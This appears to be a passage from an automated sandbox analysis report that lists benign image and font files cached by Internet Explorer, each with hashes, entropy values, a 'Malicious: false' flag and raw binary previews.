Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........r.^a....r.^a....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\2a816201-f959-4e73-b937-c8856613c1b1[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	dropped
Size (bytes):	73507
Entropy (8bit):	7.978214291440149
Encrypted:	false
SSDEEP:	1536:9Z/pYRblC9KnWq+LLlfqtvD02s1HS6ENeGdeoVi:QnWrctr03HSlemeoVi
MD5:	F1302E918DDAEB604E79EEC3194BD90F
SHA1:	FC772F1E9E1023CD9D5AB7086192AA27D11E78F3
SHA-256:	AD4D7FEA6DFA506737B03FC684B785FC6D19B5777C8536E327EA0B0A94B43A32
SHA-512:	518B2B62784E644BD422FB39E97F701F03C7799CF8B44FE3B26246CF7D3590B08D717FBC98B912539DCD2FF8774C26132868F0451C9A018BA1EB4662061094D4
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................K............................!...."1A#Q.2aq$B..3....%R....Cb.4r..5FSUc.....................................@.....................!...1AQ.."aq.2........#BR...3br.$..CDS..............?..C....GO..E.......M...&....:...<...Az.I........em...4....._B/.e..$..iq.._..TM..4".!!x..{..C/.i.Q..wY.h.tG.........bVIz=@.I..kZhO....9%lS......F.(.S..y.......Y...3..sD....Z5).\|..W.\1j.....n.x.4.\ .X.;. E..`.v.._.$...o"Q....%...h...bSD.eW..a{..Ga5...1.!.M1^.t......../.<o..Q.....ug[..E.1.Jb...M...I..R......`W..b................!..TK.E........)..5rH..h!`.G2....S.I..W...dc,,pb.#..v..OQ*E...W;)"1....\.u.6....].#..^.....U....m..qe..7.\|kP.t.F.@...M.j.1.~....Z.+...L.}........}.V..Z.f.%g..e..}.j.%.B..>......r.T....K..i...SV.Q.... ..)2.pw...Y..eX0.}.....;9.....r.0.....\|.U.L.D...&.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	dropped
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAMqFmF[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	553
Entropy (8bit):	7.46876473352088
Encrypted:	false
SSDEEP:	12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
MD5:	DE563FA7F44557BF8AC02F9768813940
SHA1:	FE7DE6F67BFE9AA29185576095B9153346559B43
SHA-256:	B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
SHA-512:	B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....RQ......%AD.Vn$R...]n\.........Z..f.....\.A.~.f \H2(2.J.uT.i.u.....0P..s..}.....P..........l.....P.....~...tb...f,.K.;.X.V...^..x<.b...lr8...bt.]..<.h.d2I.T2...sz...@.p8.x<..pH...g:...DX.Vt:.......eR..$...E.d2I..d..b.R.0...]. .j...v..A....j......H...=....@.'Z^....E\|>..tZv".^...#l.[yk(.B<j..#.H..dp.\..m....."#...b.l6.7.-.Q...l6.<.#.H.....\\|.....>/^.......eL.....9.z.....lwy.....g..h?...<...zG...c\d......q.3o9.Y.3.\|..Jg...%.t.?>....+..6.0.m.....X.q........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAORHel[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	27207
Entropy (8bit):	7.9178627928197285
Encrypted:	false
SSDEEP:	768:IvHjiQiAA21CGfetk/9PCqxmu1Z3b/2xv:IvHjiQFAGgk/JCo1Vb/I
MD5:	3FAA076543B625F929C4A75853EAC2C2
SHA1:	01263E4F74BD448F71C5067CD514135DAE0D095B
SHA-256:	62EA7124C77295DDF12A93076156BA3BFDE74AF3B8D7B5C30CEC64E8A65A958E
SHA-512:	A0ECB85DBBBB05A53324C6343CC5D89BF7494109DBCCAA1DED0C6CE8FE0F3BE2C2171967DC5C8B386B5AA0FC30D94DF2138248BCA1560658E4A8D239707BCBBF
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..n...".5.,3S!...8../..i2....)..\|.Y=)\V).c.J....Y.<SR$.$..Z\...j.^.\|0.....Th4JX...85I..iO.A..........J.R$0....7q....2L..X.Z.Dhi....[..N...Ah.\.z.2...(`W..w....2...4...O..X."X...[....qE.]..oj6.m#.....:.E0........ ...@..G.^.G,...JM.. ..k..{T..G::.OJ7...V..O.Ds!U.:.[1.Km0e..Z\........AM...........Zi..NE..~...b..8.......C.n8.....d..Lc4X..4X.84 ...).....E...Gj...I...4..........v.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAOZtDm[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	13943
Entropy (8bit):	7.955049347890374
Encrypted:	false
SSDEEP:	384:bKDYtKwUqdtoRlXDXTE9+2LgNSO8jCsZNk2j8l8LAI2vnwym:bKDVVUm/DXTEc2cAZuGAI2Pm
MD5:	FC7AC7DA0BB93A433BDD4D11FD899827
SHA1:	D76650D8A1983D0D93663C432B7FEBF4F1A6CB00
SHA-256:	FAE06E0D2A9822FF6E92F0522A60282A3AC9AEA65E61D7998E5AEEB540912B3C
SHA-512:	138819A5A76E6B48366B7A83F9790E6E2FD5EE5648B1262D8A864CC08B17E150D818D820F955A54515FEB67E74656C9F8165B620A25B869F85D3769FAE11BEC4
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...8....c'Q....g8..o.+H...R.gdq....a..H..A...9.".4`...J.1..oc.{$..A0...;..#..9KK.....VO...Cg5.)y.k.mxgW.H...2.me..<{......!sA......u....hP..l..=..q.]2jZ-..s.F.<.,.8.1.db..[.L.c.u.....N.O..a....s.]9JWL.FM.O....N...U.._..a.c..D.(o.-K..F..[j.X.$...9#.:....XURv5*.B...(......(......(............0..s/.g.28.~.....MI{.RM.7[mD..7.D....w#..^..;OB#KMLc.o....e....Q+5..m;2M5.......X.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP7w5W[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	7.807282975351981
Encrypted:	false
SSDEEP:	48:QfAuETArjHrsFocAVoSrvaNiUOBBs8vd4CDZv5eG/:Qf7EQLYFo7Vo0y8vdVDpwG/
MD5:	BA7AFFA4339DC1A2E71502DB4200337F
SHA1:	81393AD3B73C33D6E039A66CCED2A6B074B4961C
SHA-256:	2182B2505753473CE4BD737ABAA36C62B8546C5265564486B2486CF19A7EE926
SHA-512:	188B0043BE85C3FA5846AAA965C3620E3B7A6818A412E7254E1D98DF4DD75D56F4ED5E6E8555FC5167143F1899866DC02045455219522198C6354B3B9FC1E04F
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....TZ'.I^M%.+...)..FKH....e........Z....&...{..FB....h.cR..H.w...h^h.....4-.o.u......AS..>........;[M>6..b....^..*=....)..x.....R...8V..n.pi.K.d`(.b...C..8...'.....I[A.........hw0.c.SY.....{k.B$...YW...J...I..a.3L.c.S.b."c.0{)..w....R...1...@..o..3...!?"..]....c.W].-W....Mr.....=.\.$....a...).c.r..CD. ...._&...u.p.:x.V`.X.....U.5.....>U...z..Wr......ee...2.........Mm[.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP7yvI[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	26467
Entropy (8bit):	7.857569532421057
Encrypted:	false
SSDEEP:	768:IV9FX3AjygLp1TOqdy2HPctJVbONkL94Av+jBEPpR:ILFnAjyAy2vcj1ykL9kjKr
MD5:	AF2F5B39F15C0FC123C2315A47FD78C4
SHA1:	FB5BE1738F39B695524268504EAD00E16EFC3DAA
SHA-256:	B1CF65A2DD9C2F1FCE198BE3638E4ADCF2C99E1929414705178A81CFC051E95C
SHA-512:	6DDA29326564B7EC40AB1A09A5E8B9038E1B5715B5F6E4129106E8C2E43AF05932BC5D14E3154A6AFB68EF12848DA4B8C282D1880C5503207796D8DFE331EC95
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5.....(.h.1H.....b...(.....b...(.1@.(................R.(......m...@0.b...J.LP.M.!.....@.@.@.L.4.R...hL....(......]..U.#`V-..+..!..v....6....._..?.{..w..Y.......vQC.Z!..f.v..../.G1..B.l.0.J.>R........".JF.%.rP..W.....p.%..y.I..@~F.........'.....e.J...P.@.0....(...P1).P.P.R...HV....J.C@.f*K.....(.h.. .`..\P.S.. .P.....P.@..%..........b..............\R..@.5..LB..J.C@.4..P.@.4......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP9YY7[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	13581
Entropy (8bit):	7.9217517699862805
Encrypted:	false
SSDEEP:	192:Q2bh2bySX5strmEZ/N/ERHU420FkrskF8AdZVwoTYVu62PwfYc+IN6QnKHsSL:N7SX5g/NMRHUYFQHFNdPTTx628NQMSL
MD5:	7DAF439C95F2A5C34B87B233C757DC50
SHA1:	2042060DAA2AE593E732450C0098D494DB6C46B6
SHA-256:	8CB5061FCA9A20D9D5FBF53132DD81C568FC38396CC3174EBB0FBC10D035509E
SHA-512:	F795A191E0585BD8EFF30D8343F23ACF1DE7319931FEDBFEF1AE217E368899419988026A59201C2FF401421DB04CD222E2EED7E0B67605B2431D48A8FEC697FA
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...d........H.EZ..d......kB.WL"f.#?..bf.\|.j.3..2..X.e".W..P....J.QT!...Z"..Z"X...I$.....!.........-+..V.I.Ey.....q...Z.Q.yU$t.&.k.X\..@.R:,.%U.4..S....5........2..4......6.3@...)..4.....x.W...0..(a.`....hL...5."Kf./.t..nD..V....''5.Z....j.D.k.F.mdPT..4&.B.....=kTK$Z..<V..L...sO.\|..k.....t..".W.ZZ..F.{Qk....(.A..](.TK$[.=.g....J..!q@.$.C.Tg.@!....E...).......b.(..8k.l..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAP9r3b[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	dropped
Size (bytes):	7267
Entropy (8bit):	7.888000594833816
Encrypted:	false
SSDEEP:	192:QnJ04vbgqt2wWeIALvaV4xFSU8lJhgNYO6:0S4v8U2ty/0U8lzgu
MD5:	6C3F130D307D03AC7BD6FC5DA54C77A8
SHA1:	697764642BEAA859B54276D655726F7A05DC4F21
SHA-256:	783802C8ECCF014A9AEEB4263F91AF9A9E45B4C04710F701B4949AEF817BD556
SHA-512:	4EDD681FC3CB2ECCE4EF22B0D03AC99E32D455048BF8C37C8FC227209BFE175134886163B063DAF58093CD86EB4E27599BC3191035DABF225B6C69CD8A734A52
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...AC..8P...h.h.h......,..uU$R....H...........\.=...zf.%..7..Bz?u...ZB.s..n....SZ.p...R...Z.5.....=(.ibr3..]..~z.L._.T...f.K"..k............z.4.bh...!..]..... ..XHN..@.d.....=).......$...+..N..bDp98..@...si'.....i.A0.YO ....9...+C ......P...i....4.XR..@....@.@.@.L..j.d.'Q.a...]?..sn3x.}k.'..4.0.:.ZD.....=3.Z"H...O.....c..ni....$.+6.K-...z.P.C..).!.1.........J`J.sH.t....i.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPa34D[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	12647
Entropy (8bit):	7.85688555467823
Encrypted:	false
SSDEEP:	384:NZmUdFnjyddstPBDHHReN/KzQxsx9yIYt79:NEKjyktpnM/6QCP4b
MD5:	7EC15FC40F0D6E5943748B87C3FD2439
SHA1:	6AA52A7FF29050780E2C7803CEAD16D1EE388725
SHA-256:	9765960620FA9290C64F0F2AB3266D174DF6B8CDC45C8981DD6C856A49522874
SHA-512:	10E19EF476CCC30B560EF1790953CC3AA3B585C53BCDAD360A32471A2128D9A05BC97299596FD6146C7D7766ADB51BB145FA7121066918C596DF3733E5E7C2AB
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..>./..........G*...'..;!\M....t....,.d..b..(.i.S......b...X..XA.v...,..Q`.m..p.E....m...(.\\Qa..,0.................. .P0..%...R.(..(....... .....v..(...)...X.....1..,..Q`.....................b.........b..P..@%...b...(.(.P.H..........1h.S.................`-...(..........P.@....P.P.@.)...(......J.).P.P0..P.jF-0..Z.).Z.)...Z.(.....@......-.....d.!#...X..@.zb.....(....BP.@....(......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaEWW[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	dropped
Size (bytes):	12315
Entropy (8bit):	7.952955222756471
Encrypted:	false
SSDEEP:	384:0AO9mu1kHg4MX5foV+VBv5JB/KWFcdgrz:0Abu1kAr1v5nSWggn
MD5:	7FDF90FB5EB1D053FE913C49E67F986B
SHA1:	7AE44AF78BE82C5E63947EECEC5DFC943172C01B
SHA-256:	DE069FDB5B80C77FF29CBDBCA2FAC199C8DAAC58842E041AE4A65D6311E84EE4
SHA-512:	F4BB5AC10599376555DCAC574256ED7F696DC72092C956FB4230685CE47141FC2972AA774C3ADF2BD5F72718FCEAE74F94C1B916974709FA5EC74A94C421388F
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...d..p..1[T..=.X.o..@.jQr"...2...'..e.Q........GI.+.........H}.....$0.'...>..Q=H.8Bh.1.W..s.Au4e$O...J......(....#.....o..........-...\A.n........o....$..c7U..4..6.%...l.2[.j...({.a..............U..C..DNx.l.HQ...b9FE"...P.sL.U..........b...@..E.I02.8....r.q..&.s!..Z.1.~..d....d. 8f.f..2.....v. 6O.`MP.=.#......GLR.,....s....".(.5.2Vy....c?..5..j_f-4nH$.O...r.....E. b:...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaKlK[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	1288
Entropy (8bit):	7.378586675757247
Encrypted:	false
SSDEEP:	24:QI/OtlM0XxDuLHeOWXG427DAJuLHenX3MuPd/u/b4phZbBEbseMlKV+:QfAuETAauPdmT4jDEbsmV+
MD5:	DF7C62E6B90FBD14794F2E2E8FDDDC80
SHA1:	884D83F6D52DD94BA99CDA6C9D19D72B5D20B3B0
SHA-256:	3350BCBA49CD0655166194429790717F505713555D60B98209B68458EB0864C2
SHA-512:	5EBA5A9A755F7BB6CA5DC18DCD7FF7339B0A5809C6720796FA28CBC9838E1B77286ED9E6535949CBFCE51D5330062915EAF6D7E211944A9494F5C4C56D4EE7EF
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..n.#.).(.h.(.....if..ny8.z..P.....j.3!.'.A,.H.h.r:......P.7J.2#..(...zT.P...i.Z.(...6.[.4i.U..q.MZ...;!......Q..$..Z..[.E+...F...=.kS.e.1.RBc).J.(.....`=....JC$..e.8.^..lWH...g8...m....J~....%M.U:.,...4Y$......r....S.m.k:.J...%.!..9.\.........@....P.@.).*..R...B......V.......X........8..<@......Q..p...N>..$r.....P.FQ5%..%...P.@..-.I..A.Z:..&.j.8.y...6.K.k..).+.P~.F.Zkp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaLRV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	29167
Entropy (8bit):	7.921884697743823
Encrypted:	false
SSDEEP:	768:IkxG+b1rWbw+wPaRm5RVatvHjQ1nYFXFrSV6ET:IkxG+blgOPaWC81nYxF1ET
MD5:	A60C016C25D8FE136E3E2520BE7CE1DB
SHA1:	30C1A8105D66A5C2C495E5691AC99207C2962C1D
SHA-256:	EF20D6527BD47D403590E703B67B2D1CCB167019EDEE80F9D8B413F8A054EE43
SHA-512:	4921AC55C753AB948E84245A21D1A5EDA2064F1BDD32E9B2AE64A2EC9101463CA0699D7C897A3D2D6FA1951A9926C2D468547352DF0B5533AA308196BF949620
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..T ......P.R.-......._.f..!<y<w........h]..87.#.$C.......z.S...h..:.@h.(.....'_...l%.....X..T..........!.$......$..............tP....@.v/....m_AH.~..lU #.T!..........e..Q@.P1...&#F.~.T.-.6...b. .a@.....@.@....(@..J.(.....%............P.@.W....B.W?tU $O.I.u ..CLbP..o... 4..A@.....U}..4...t~T......*M./]....h.l...Fn"...'...Vc..........D]n.....A'.<t....7.Gqn.Q...\|....a\...N.{..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPadFc[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	13116
Entropy (8bit):	7.962182391452064
Encrypted:	false
SSDEEP:	192:Qo7aEn6bsrrbWbcEFgKk14/ep/GycMSAfLnIBNYRwu12pMCFr4/4SNERXWVByK+6:b9EFgKk14/Spxmi12pM68F6XWVBJdNv5
MD5:	B421478D0D530DE09B7796BB070BD2D4
SHA1:	787FD68F11749377F88DBB46C145DFB026968871
SHA-256:	F85480723A178582BD3E4F7401F7DDDCE4D6E088889D2569FD77A7127AC800C5
SHA-512:	647D86545C480A429E1D18A3671CB2565F6AF62E7439E2CC235D3A2ED9BC857CBDB8DE117E64185C2D125178CDF7477B081C84015AC3753C1F40076AD69FE443
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..e.g...Ca.6.=i\,.#&/.;.T.:.'[.8".U.)a{..@.L.9D..i.8...(.....{.s...s......x/J.0i..^VE..aS@.J.. .z._).e.1@..h....h.u.....P.vP.......nph.8....L.J.S=...nL..h-.t.Vf..V...u9....Z..iq~\\|......].Fs..s!..Cg4......b..<J..FR...,[L.>n.&.8.8u.x.7V........h..r.r...c74k.h..h..S.._!pG.4...q."...(.....s.......He....)..d..."...*.=..3{'\|..p.[.4...1...;wc#.I........P.....TI..z`u.T]..&D

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaiCX[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	20400
Entropy (8bit):	7.955007668006029
Encrypted:	false
SSDEEP:	384:NNt3qUuoIgPRSYRsUcegu8JNInv2X5VHtyCGdfQYfGQ:NNR7uoIg2jPujKbN0JGQ
MD5:	8235BC0F2EF0A960A0D2A244D4E25145
SHA1:	4EFC5E86680E82C752C5BA1815272A49E7E4FD4D
SHA-256:	A34704EECDBA02E65E424B137B8AEF704F182F7A0EF78F08E7AF48637B1DB963
SHA-512:	F762B17BF03F645EFCC2208F57A99A286128C136A9CED778C88EF4ABDBF7EAA6C8F1FF07EAEC75B6963BBCACDD8039272D1B04F1A3BA27DFCCC004858DD39A35
Malicious:	false
